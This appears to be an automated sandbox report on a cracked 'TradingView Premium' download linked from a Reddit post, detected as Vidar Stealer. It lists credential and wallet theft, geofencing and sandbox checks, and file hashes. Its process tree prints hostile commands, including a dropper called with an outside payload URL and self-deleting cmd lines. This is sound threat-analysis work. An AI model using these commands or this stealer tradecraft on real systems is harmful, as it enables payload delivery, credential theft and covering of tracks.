Analysis
-
max time kernel
173s -
max time network
340s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-10-2024 14:36
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
Resource
win10v2004-20241007-en
General
-
Target
https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/
Malware Config
Signatures
-
Detect Vidar Stealer 8 IoCs
resource yara_rule behavioral1/memory/5052-415-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/5716-523-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/5052-534-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/2228-556-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/4000-574-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/5716-614-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/4000-724-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 behavioral1/memory/2228-725-0x0000000000580000-0x00000000018D9000-memory.dmp family_vidar_v7 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation HDAKFC.exe -
Executes dropped EXE 11 IoCs
pid Process 5232 HDAKFC.exe 1996 HDAKFC.exe 1792 HDAKFC.exe 3116 HDAKFC.exe 2192 HDAKFC.exe 6032 HDAKFC.exe 5684 HDAKFC.exe 5852 HDAKFC.exe 6036 HDAKFC.exe 5692 HDAKFC.exe 6108 HDAKFC.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradingView Premium Desktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradingView Premium Desktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Premium Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Premium Desktop.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TradingView Premium Desktop.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TradingView Premium Desktop.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 2940 timeout.exe 436 timeout.exe 5496 timeout.exe 3508 timeout.exe 3240 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings msedge.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2260 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 4812 msedge.exe 4812 msedge.exe 4660 msedge.exe 4660 msedge.exe 4488 identity_helper.exe 4488 identity_helper.exe 3528 msedge.exe 3528 msedge.exe 5692 msedge.exe 5692 msedge.exe 5692 msedge.exe 5692 msedge.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5052 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 5716 TradingView Premium Desktop.exe 2228 TradingView Premium Desktop.exe 2228 TradingView Premium Desktop.exe 2228 TradingView Premium Desktop.exe 2228 TradingView Premium Desktop.exe 4000 TradingView Premium Desktop.exe 4000 TradingView Premium Desktop.exe 4000 TradingView Premium Desktop.exe 4000 TradingView Premium Desktop.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe 4660 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4660 wrote to memory of 4556 4660 msedge.exe 84 PID 4660 wrote to memory of 4556 4660 msedge.exe 84 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 2904 4660 msedge.exe 85 PID 4660 wrote to memory of 4812 4660 msedge.exe 86 PID 4660 wrote to memory of 4812 4660 msedge.exe 86 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87 PID 4660 wrote to memory of 1472 4660 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.reddit.com/r/Cracked_Software_Hub/comments/1fo875c/tradingview_premium_cracked_version_available_for/1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb397546f8,0x7ffb39754708,0x7ffb397547182⤵PID:4556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:82⤵PID:1472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:32
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵PID:4752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:1300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:12⤵PID:3800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:3696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:12⤵PID:3416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:12⤵PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2116 /prefetch:82⤵PID:5964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:12⤵PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,14755040523241585038,7068528813297035620,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4884 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5692
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:612
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2836
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5304
-
C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5052 -
C:\ProgramData\HDAKFC.exeC:\ProgramData\\HDAKFC.exe https://apklight.com/clips.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5232 -
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:1996
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:1792
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:3116
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:2192
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:6032
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:5684
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:5852
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:6036
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:5692
-
-
C:\ProgramData\HDAKFC.exeC:\ProgramData\HDAKFC.exe3⤵
- Executes dropped EXE
PID:6108
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\ProgramData\HDAKFC.exe" & exit3⤵PID:2468
-
C:\Windows\system32\timeout.exetimeout /t 104⤵
- Delays execution with timeout.exe
PID:2940
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HJKJKKKJJJKJ" & exit2⤵
- System Location Discovery: System Language Discovery
PID:180 -
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:436
-
-
-
C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5716 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDGIECGIEBKJ" & exit2⤵PID:5108
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:5496
-
-
-
C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2228 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DHIECGCAEBFI" & exit2⤵PID:5440
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:3240
-
-
-
C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4000 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAKEHIIDGD" & exit2⤵PID:5956
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:3508
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\License Terms\License_SQLNCLI_ENU.txt1⤵PID:5984
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\DAC\bin\en\License_DACFx.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2260
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Client SDK\90\Shared\Resources\1028\License_SysClrTypes.rtf" /o ""1⤵PID:5388
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Client SDK\90\Shared\Resources\1033\License_SysClrTypes.rtf" /o ""1⤵PID:4968
-
C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"C:\Users\Admin\Downloads\TradingView Premium Desktop.exe"1⤵PID:5768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
669KB
MD5550686c0ee48c386dfcb40199bd076ac
SHA1ee5134da4d3efcb466081fb6197be5e12a5b22ab
SHA256edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
SHA5120b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
439KB
MD55ff1fca37c466d6723ec67be93b51442
SHA134cc4e158092083b13d67d6d2bc9e57b798a303b
SHA2565136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA5124802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
251KB
MD54e52d739c324db8225bd9ab2695f262f
SHA171c3da43dc5a0d2a1941e874a6d015a071783889
SHA25674ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA5122d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6
-
Filesize
78KB
MD5a37ee36b536409056a86f50e67777dd7
SHA11cafa159292aa736fc595fc04e16325b27cd6750
SHA2568934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA5123a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
20KB
MD5fe1b8a9870d1a023ab7381722bea49e9
SHA170df8c4ace452d16d452742a31c37f59ca395131
SHA25689aeea796fb240533a81303f169212ed4e1d29d208a18760696b5b00a8b73146
SHA5125f00d00c184042e9c067e0404a4ecbcabddce8173762d07b58ca4d122c65405a24abd0bbb64e3f2f2dfc84d23ca464de30df1c177b22ed3591704fc7ce9d7004
-
Filesize
40KB
